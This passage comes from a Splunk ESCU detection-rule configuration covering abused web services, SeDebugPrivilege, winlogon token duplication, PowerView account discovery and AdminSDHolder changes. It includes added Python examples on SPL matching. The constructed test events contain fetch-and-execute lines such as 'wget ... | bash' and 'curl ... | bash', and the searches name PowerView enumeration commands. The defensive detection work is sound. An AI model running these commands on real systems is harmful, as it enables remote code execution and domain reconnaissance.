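The W3WP, Wermgr and wget searches above all combine a process constraint with OR-ed command-line alternatives. In SPL, AND (explicit, or the implicit AND between adjacent terms) binds tighter than OR, so unless the alternatives are parenthesised as a group the OR branch escapes the process constraint and the search fires on unrelated processes. The following Python is an added example, not part of Splunk ESCU: it evaluates the wget predicate both as SPL parses it when only the inner terms are grouped and as intended, over constructed process events, so the difference can be seen on concrete command lines.

```python
"""
Added example, not part of Splunk ESCU: SPL operator precedence in the
'Wget Download and Bash Execution' predicate. AND (explicit or the implicit AND
between adjacent terms) binds tighter than OR, so
  process_name=wget (A OR B AND C) OR (D AND E)
parses as (wget AND (A OR (B AND C))) OR (D AND E), and the second branch is not
constrained to wget. Process events below are constructed, not real telemetry.
"""
import fnmatch

# Constructed events in the shape of the Endpoint.Processes data model.
EVENTS = [
    {"process_name": "wget", "process": "wget -q -O- http://203.0.113.10/x.sh | bash"},
    {"process_name": "wget", "process": "wget --quiet -O- http://203.0.113.10/x.sh | sh"},
    {"process_name": "wget", "process": "wget -q http://mirror.example/pkg.tar.gz"},
    {"process_name": "grep", "process": "grep -r token /var/log | bash -c cat"},
    {"process_name": "curl", "process": "curl -s http://203.0.113.10/x.sh | bash"},
]


def like(value, pattern):
    """SPL-style wildcard comparison: '*' matches any run of characters, case-insensitive."""
    return fnmatch.fnmatchcase(value.lower(), pattern.lower())


def as_parsed_without_grouping(event):
    """The predicate as SPL parses it when only the inner terms are parenthesised:
    (process_name=wget AND (quiet_short OR (quiet_long AND to_stdout))) OR (pipe AND bash)."""
    p = event["process"]
    quiet_short, quiet_long = like(p, "*-q *"), like(p, "*--quiet*")
    to_stdout = like(p, "*-O- *")
    pipe, bash = like(p, "*|*"), like(p, "*bash*")
    return (event["process_name"] == "wget" and (quiet_short or (quiet_long and to_stdout))) \
        or (pipe and bash)


def as_intended(event):
    """Explicit grouping: wget AND ((quiet AND to_stdout) OR (pipe AND bash))."""
    p = event["process"]
    quiet = like(p, "*-q *") or like(p, "*--quiet*")
    to_stdout = like(p, "*-O- *")
    piped_to_bash = like(p, "*|*") and like(p, "*bash*")
    return event["process_name"] == "wget" and ((quiet and to_stdout) or piped_to_bash)


def compare(events=EVENTS):
    """Return the command lines each grouping would flag."""
    return {
        "without_grouping": [e["process"] for e in events if as_parsed_without_grouping(e)],
        "intended": [e["process"] for e in events if as_intended(e)],
    }


if __name__ == "__main__":
    for grouping, hits in compare().items():
        print(grouping, len(hits), hits)
```

Without the outer grouping every constructed event is flagged, including the `grep` and `curl` pipelines that never involve wget and the quiet wget download that is never piped anywhere; with the alternatives grouped only the two wget-to-shell pipelines remain. The same correction applies to the `process_cmd`/`process_powershell` macros in the W3WP and Wermgr searches: wrap the two macros in parentheses after the parent-process constraint.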
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1102"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects a suspicious process making a DNS query to known, abused web services: text-paste sites, VoIP and instant messaging platforms, secure tunneling services, and digital distribution platforms used to download external files. This technique is abused by adversaries, malware authors, and red teams to download a malicious file onto the target host, and is a good TTP indicator for possible initial access. False positives are expected where these instant messaging or paste services, or common applications such as Telegram or Discord, are allowed in the corporate network. action.escu.how_to_implement = This detection relies on Sysmon logs with Event ID 22, DNS Query. We suggest you run this detection at least once a day over the last 14 days. action.escu.known_false_positives = Noise and false positives can be seen if these instant messaging or paste services are allowed within the corporate network. In this case, a filter is needed. 
action.escu.creation_date = 2023-09-20 action.escu.modification_date = 2023-09-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Abused Web Services - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["NjRAT"] action.risk = 1 action.risk.param._risk_message = A DNS query to known abused web services from $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 36}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Abused Web Services - Rule action.correlationsearch.annotations = {"analytic_story": ["NjRAT"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1102"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects a suspicious process making a DNS query to known, abused web services: text-paste sites, VoIP and instant messaging platforms, secure tunneling services, and digital distribution platforms used to download external files. This technique is abused by adversaries, malware authors, and red teams to download a malicious file onto the target host, and is a good TTP indicator for possible initial access. False positives are expected where these instant messaging or paste services, or common applications such as Telegram or Discord, are allowed in the corporate network. 
action.notable.param.rule_title = Windows Abused Web Services action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=22 QueryName IN ("*pastebin*", "*textbin*", "*ngrok.io*", "*discord*", "*duckdns.org*", "*pasteio.com*") | stats count min(_time) as firstTime max(_time) as lastTime by Image QueryName QueryStatus process_name QueryResults Computer | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_abused_web_services_filter` [ESCU - Windows Access Token Manipulation SeDebugPrivilege - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a suspicious process enabling the "SeDebugPrivilege" privilege token. SeDebugPrivilege allows a process to inspect and adjust the memory of other processes, and has long been a security concern. SeDebugPrivilege allows the token bearer to access any process or thread, regardless of security descriptors, per Palantir. Adversaries abuse this privilege so that their malicious software can open or debug other processes in order to dump credentials or inject malicious code. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1134.002", "T1134"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies a suspicious process enabling the "SeDebugPrivilege" privilege token. SeDebugPrivilege allows a process to inspect and adjust the memory of other processes, and has long been a security concern. SeDebugPrivilege allows the token bearer to access any process or thread, regardless of security descriptors, per Palantir. 
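Both the Wermgr IP-check search and the Windows Abused Web Services search above hinge on a `QueryName IN (...)` list over Sysmon EventCode 22. In the SPL search command that comparison is case-insensitive, `*` matches any run of characters, and an entry with no `*` (such as `ident.me` or `www.myexternalip.com`) matches only that exact name, so a query for a subdomain of it is not flagged. The following Python is an added example, not part of Splunk ESCU: it reproduces that matching over constructed Sysmon DNS events for both lists so the coverage and the false-positive surface can be inspected before the searches are enabled.

```python
"""
Added example, not part of Splunk ESCU: how the QueryName IN (...) lists in the
'Wermgr Process Connecting To IP Check Web Services' and 'Windows Abused Web
Services' searches match Sysmon EventCode 22 QueryName values. In the SPL search
command, field IN (...) is a case-insensitive comparison in which '*' matches any
run of characters and an entry without '*' matches only the exact value.
"""
import re

# Entries taken from the two searches above (a subset of the IP-check list).
IP_CHECK = ["*wtfismyip.com", "*checkip.amazonaws.com", "*ipinfo.io", "*api.ipify.org",
            "*icanhazip.com", "ident.me", "www.myexternalip.com"]
ABUSED_SERVICES = ["*pastebin*", "*textbin*", "*ngrok.io*", "*discord*",
                   "*duckdns.org*", "*pasteio.com*"]


def spl_in_matcher(entries):
    """Compile an SPL IN() list into one anchored, case-insensitive regex:
    every '*' becomes '.*', everything else is matched literally."""
    alternatives = [".*".join(re.escape(part) for part in entry.split("*"))
                    for entry in entries]
    return re.compile("^(?:" + "|".join(alternatives) + ")$", re.IGNORECASE)


# Constructed Sysmon EventCode 22 events (only the fields the searches use).
EVENTS = [
    {"Computer": "ws01", "process_name": "wermgr.exe", "QueryName": "api.ipify.org"},
    {"Computer": "ws01", "process_name": "wermgr.exe", "QueryName": "www.ident.me"},
    {"Computer": "ws01", "process_name": "wermgr.exe", "QueryName": "IDENT.ME"},
    {"Computer": "ws02", "process_name": "chrome.exe", "QueryName": "ipinfo.io"},
    {"Computer": "ws02", "process_name": "Discord.exe", "QueryName": "cdn.discordapp.com"},
    {"Computer": "ws03", "process_name": "powershell.exe", "QueryName": "pastebin.com"},
    {"Computer": "ws03", "process_name": "svchost.exe", "QueryName": "time.windows.com"},
]


def wermgr_ip_check(events):
    """Filter of the first search: process_name = wermgr.exe AND QueryName IN (IP_CHECK)."""
    match = spl_in_matcher(IP_CHECK)
    return [e["QueryName"] for e in events
            if e["process_name"].lower() == "wermgr.exe" and match.match(e["QueryName"])]


def abused_web_services(events):
    """Filter of the second search: any process whose QueryName IN (ABUSED_SERVICES)."""
    match = spl_in_matcher(ABUSED_SERVICES)
    return [(e["process_name"], e["QueryName"]) for e in events if match.match(e["QueryName"])]


if __name__ == "__main__":
    print("wermgr IP check hits:", wermgr_ip_check(EVENTS))
    print("abused web service hits:", abused_web_services(EVENTS))
```

The `www.ident.me` query from wermgr.exe is not flagged because the list entry `ident.me` carries no leading `*`; prefix it with `*` if subdomains should be covered. The `ipinfo.io` query from chrome.exe is ignored by the first search because of its process constraint, while the `cdn.discordapp.com` hit from Discord.exe is exactly the false positive the second search's known_false_positives field warns about and is what the `windows_abused_web_services_filter` macro exists to suppress.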
Adversaries abuse this privilege so that their malicious software can open or debug other processes in order to dump credentials or inject malicious code. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting Windows Security Event Logs with EventCode 4703 enabled. The Windows TA is also required. action.escu.known_false_positives = Some native binaries and browser applications may request SeDebugPrivilege. Filter as needed. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Access Token Manipulation SeDebugPrivilege - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Brute Ratel C4", "AsyncRAT", "DarkGate Malware", "CISA AA23-347A", "PlugX"] action.risk = 1 action.risk.param._risk_message = A process $ProcessName$ adjusted its privileges with SeDebugPrivilege on $Computer$. 
action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 36}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Access Token Manipulation SeDebugPrivilege - Rule action.correlationsearch.annotations = {"analytic_story": ["Brute Ratel C4", "AsyncRAT", "DarkGate Malware", "CISA AA23-347A", "PlugX"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1134.002", "T1134"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4703 EnabledPrivilegeList = "*SeDebugPrivilege*" AND NOT(ProcessName IN ("*\\Program File*", "*\\System32\\lsass.exe*", "*\\SysWOW64\\lsass.exe*", "*\\SysWOW64\\svchost.exe*", "*\\System32\\svchost.exe*")) | stats count min(_time) as firstTime max(_time) as lastTime by Computer ProcessName ProcessId SubjectDomainName SubjectUserName SubjectUserSid TargetUserName TargetLogonId TargetDomainName EnabledPrivilegeList action | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_access_token_manipulation_sedebugprivilege_filter` [ESCU - Windows Access Token Manipulation Winlogon Duplicate Token Handle - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a process requesting access to winlogon.exe in order to duplicate its token handle. Several adversaries use this technique to elevate the privileges of their own process. winlogon.exe is the common target because it runs as SYSTEM and holds high-privilege security tokens. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1134.001", "T1134"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies a process requesting access to winlogon.exe in an attempt to duplicate its handle. This technique has been observed in the tooling of several adversaries as a way to gain privileges for their process. Winlogon.exe is the common target of this technique because it holds high privileges and security tokens.
action.escu.how_to_implement = To successfully implement this search, you must be ingesting data that records process activity from your hosts to populate the endpoint data model in the processes node. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA.
action.escu.known_false_positives = It is possible legitimate applications will request access to winlogon; filter as needed.
action.escu.creation_date = 2022-08-24
action.escu.modification_date = 2022-08-24
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows Access Token Manipulation Winlogon Duplicate Token Handle - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Sysmon"]
action.escu.analytic_story = ["Brute Ratel C4"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows Access Token Manipulation Winlogon Duplicate Token Handle - Rule
action.correlationsearch.annotations = {"analytic_story": ["Brute Ratel C4"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1134.001", "T1134"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `sysmon` EventCode=10 TargetImage IN("*\\system32\\winlogon.exe*", "*\\SysWOW64\\winlogon.exe*") GrantedAccess = 0x1040 | stats count min(_time) as firstTime max(_time) as lastTime by SourceImage TargetImage SourceProcessGUID TargetProcessGUID SourceProcessId TargetProcessId GrantedAccess CallTrace dest user_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_access_token_manipulation_winlogon_duplicate_token_handle_filter`

[ESCU - Windows Access Token Winlogon Duplicate Handle In Uncommon Path - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies a process requesting access to winlogon.exe to duplicate its handle from a non-common or public process source path. This technique was seen where adversaries attempt to gain privileges for their process. This duplicate handle access technique may refer to a malicious process duplicating the process token of winlogon.exe and using it for a new process instance. Winlogon.exe is the common target of this technique because it holds high privileges and security tokens.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1134.001", "T1134"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies a process requesting access to winlogon.exe to duplicate its handle from a non-common or public process source path. This technique was seen where adversaries attempt to gain privileges for their process. This duplicate handle access technique may refer to a malicious process duplicating the process token of winlogon.exe and using it for a new process instance. Winlogon.exe is the common target of this technique because it holds high privileges and security tokens.
action.escu.how_to_implement = To successfully implement this search, you must be ingesting data that records process activity from your hosts to populate the endpoint data model in the processes node. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA.
action.escu.known_false_positives = It is possible legitimate applications will request access to winlogon; filter as needed.
action.escu.creation_date = 2022-08-24
action.escu.modification_date = 2022-08-24
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows Access Token Winlogon Duplicate Handle In Uncommon Path - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Sysmon"]
action.escu.analytic_story = ["Brute Ratel C4"]
action.risk = 1
action.risk.param._risk_message = A process $SourceImage$ is duplicating the handle token of winlogon.exe on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "SourceImage", "risk_object_type": "other", "risk_score": 49}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows Access Token Winlogon Duplicate Handle In Uncommon Path - Rule
action.correlationsearch.annotations = {"analytic_story": ["Brute Ratel C4"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1134.001", "T1134"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `sysmon` EventCode=10 TargetImage IN("*\\system32\\winlogon.exe*", "*\\SysWOW64\\winlogon.exe*") AND GrantedAccess = 0x1040 AND NOT (SourceImage IN("C:\\Windows\\*", "C:\\Program File*", "%systemroot%\\*")) | stats count min(_time) as firstTime max(_time) as lastTime by Computer SourceImage TargetImage SourceProcessGUID TargetProcessGUID SourceProcessId TargetProcessId GrantedAccess CallTrace | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_access_token_winlogon_duplicate_handle_in_uncommon_path_filter`

[ESCU - Windows Account Discovery for None Disable User Account - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic utilizes PowerShell Script Block Logging to identify the execution of the PowerView PowerShell cmdlet Get-NetUser with a filter or parameter that queries Active Directory user accounts that are not disabled. The full script block text based on the CISA-23-347A advisory is "Get-NetUser -UACFilter NOT_ACCOUNTDISABLE". Utilize this query to identify potentially suspicious user account enumeration.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087", "T1087.001"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging to identify the execution of the PowerView PowerShell cmdlet Get-NetUser with a filter or parameter that queries Active Directory user accounts that are not disabled. The full script block text based on the CISA-23-347A advisory is "Get-NetUser -UACFilter NOT_ACCOUNTDISABLE". Utilize this query to identify potentially suspicious user account enumeration.
action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell.
action.escu.known_false_positives = Administrators may leverage PowerView for legitimate purposes; filter as needed.
action.escu.creation_date = 2023-12-15
action.escu.modification_date = 2023-12-15
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows Account Discovery for None Disable User Account - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["CISA AA23-347A"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows Account Discovery for None Disable User Account - Rule
action.correlationsearch.annotations = {"analytic_story": ["CISA AA23-347A"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087", "T1087.001"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 ScriptBlockText = "*Get-NetUser*" ScriptBlockText = "*NOT_ACCOUNTDISABLE*" ScriptBlockText = "*-UACFilter*" | rename Computer as dest, UserID as user | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText dest user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_account_discovery_for_none_disable_user_account_filter`

[ESCU - Windows Account Discovery for Sam Account Name - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic leverages Event ID 4104 to identify the execution of the PowerView PowerShell cmdlet Get-NetUser with a filter or parameter that queries the "samaccountname" of Active Directory user accounts. This hunting query is a good pivot to look for suspicious processes or malware that gather user account information on a host or within the network.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic leverages Event ID 4104 to identify the execution of the PowerView PowerShell cmdlet Get-NetUser with a filter or parameter that queries the "samaccountname" of Active Directory user accounts. This hunting query is a good pivot to look for suspicious processes or malware that gather user account information on a host or within the network.
action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell.
action.escu.known_false_positives = Administrators may leverage PowerView for legitimate purposes; filter as needed.
action.escu.creation_date = 2023-12-15
action.escu.modification_date = 2023-12-15
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows Account Discovery for Sam Account Name - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["CISA AA23-347A"]
action.risk = 1
action.risk.param._risk_message = Windows Account Discovery for Sam Account Name on $dest$.
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 15}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows Account Discovery for Sam Account Name - Rule
action.correlationsearch.annotations = {"analytic_story": ["CISA AA23-347A"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 ScriptBlockText = "*Get-NetUser*" ScriptBlockText IN ("*samaccountname*", "*pwdlastset*") | rename Computer as dest, UserID as user | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText dest user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_account_discovery_for_sam_account_name_filter`

[ESCU - Windows Account Discovery With NetUser PreauthNotRequire - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic leverages Event ID 4104 to identify the execution of the PowerView PowerShell cmdlet Get-NetUser. This technique was observed in the context of PowerView's Get-NetUser cmdlet with a filter or parameter that queries Active Directory user accounts that do not require Kerberos preauthentication. This hunting query is a good pivot to look for suspicious processes or malware that gather user account information on a host or within the network.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic leverages Event ID 4104 to identify the execution of the PowerView PowerShell cmdlet Get-NetUser. This technique was observed in the context of PowerView's Get-NetUser cmdlet with a filter or parameter that queries Active Directory user accounts that do not require Kerberos preauthentication. This hunting query is a good pivot to look for suspicious processes or malware that gather user account information on a host or within the network.
action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell.
action.escu.known_false_positives = Administrators may leverage PowerView for legitimate purposes; filter as needed.
action.escu.creation_date = 2023-12-15
action.escu.modification_date = 2023-12-15
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows Account Discovery With NetUser PreauthNotRequire - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["CISA AA23-347A"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows Account Discovery With NetUser PreauthNotRequire - Rule
action.correlationsearch.annotations = {"analytic_story": ["CISA AA23-347A"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 ScriptBlockText = "*Get-NetUser*" ScriptBlockText = "*-PreauthNotRequire*" | rename Computer as dest, UserID as user | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText dest user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_account_discovery_with_netuser_preauthnotrequire_filter`

[ESCU - Windows AD Abnormal Object Access Activity - Rule]
action.escu = 0
action.escu.enabled = 1
description = Windows Active Directory contains numerous objects. A statistically significant increase in access to these objects may be evidence of attacker enumeration of Active Directory.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087", "T1087.002"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = Windows Active Directory contains numerous objects. A statistically significant increase in access to these objects may be evidence of attacker enumeration of Active Directory.
action.escu.how_to_implement = Enable Audit Directory Service Access via GPO and collect event code 4662. The required SACLs need to be created for the relevant objects. Be aware that Splunk filters this event by default on the Windows TA. We recommend pre-filtering any known service accounts that frequently query AD to make the detection more accurate. Setting a wide search window of 48 to 72 hours may smooth out misfires.
action.escu.known_false_positives = Service accounts or applications that routinely query Active Directory for information.
action.escu.creation_date = 2023-06-01
action.escu.modification_date = 2023-06-01
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows AD Abnormal Object Access Activity - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Active Directory Discovery"]
action.risk = 1
action.risk.param._risk_message = The account $user$ accessed an abnormal amount ($ObjectName_count$) of [$ObjectType$] AD object(s) between $firstTime$ and $lastTime$.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows AD Abnormal Object Access Activity - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087", "T1087.002"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `wineventlog_security` EventCode=4662 | stats min(_time) AS firstTime, max(_time) AS lastTime, dc(ObjectName) AS ObjectName_count, values(ObjectType) AS ObjectType, latest(Computer) AS dest count BY SubjectUserName | eventstats avg(ObjectName_count) AS average stdev(ObjectName_count) AS standarddev | eval limit = round((average+(standarddev*3)),0), user = SubjectUserName | where ObjectName_count > limit | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_ad_abnormal_object_access_activity_filter`

[ESCU - Windows AD AdminSDHolder ACL Modified - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies the modification of the Access Control List for the AdminSDHolder object within a Windows domain. Specifically, the detection triggers on the addition of a new rule to the existing ACL. AdminSDHolder is an object located in the System Partition in Active Directory and is used as a security template for objects that are members of certain privileged groups. Objects in these groups are enumerated and any objects with security descriptors that don't match the AdminSDHolder ACL are flagged for updating. The Security Descriptor propagator (SDProp) process runs every 60 minutes on the PDC Emulator and re-stamps the object Access Control List (ACL) with the security permissions set on the AdminSDHolder. An adversary who has obtained privileged access to a Windows Domain may modify the AdminSDHolder ACL to establish persistence and allow an unprivileged user to take control of a domain.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies the modification of the Access Control List for the AdminSDHolder object within a Windows domain. Specifically, the detection triggers on the addition of a new rule to the existing ACL. AdminSDHolder is an object located in the System Partition in Active Directory and is used as a security template for objects that are members of certain privileged groups. Objects in these groups are enumerated and any objects with security descriptors that don't match the AdminSDHolder ACL are flagged for updating. The Security Descriptor propagator (SDProp) process runs every 60 minutes on the PDC Emulator and re-stamps the object Access Control List (ACL) with the security permissions set on the AdminSDHolder. An adversary who has obtained privileged access to a Windows Domain may modify the AdminSDHolder ACL to establish persistence and allow an unprivileged user to take control of a domain.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting eventcode `5136`. The Advanced Security Audit policy setting `Audit Directory Services Changes` within `DS Access` needs to be enabled. Additionally, a SACL needs to be created for the AdminSDHolder object in order to log modifications.
action.escu.known_false_positives = Adding new users or groups to the AdminSDHolder ACL is not usual. Filter as needed.
action.escu.creation_date = 2022-11-15
action.escu.modification_date = 2022-11-15
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows AD AdminSDHolder ACL Modified - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Sneaky Active Directory Persistence Tricks"]
action.risk = 1
action.risk.param._risk_message = The AdminSDHolder domain object has been modified on $Computer$ by $SubjectUserName$
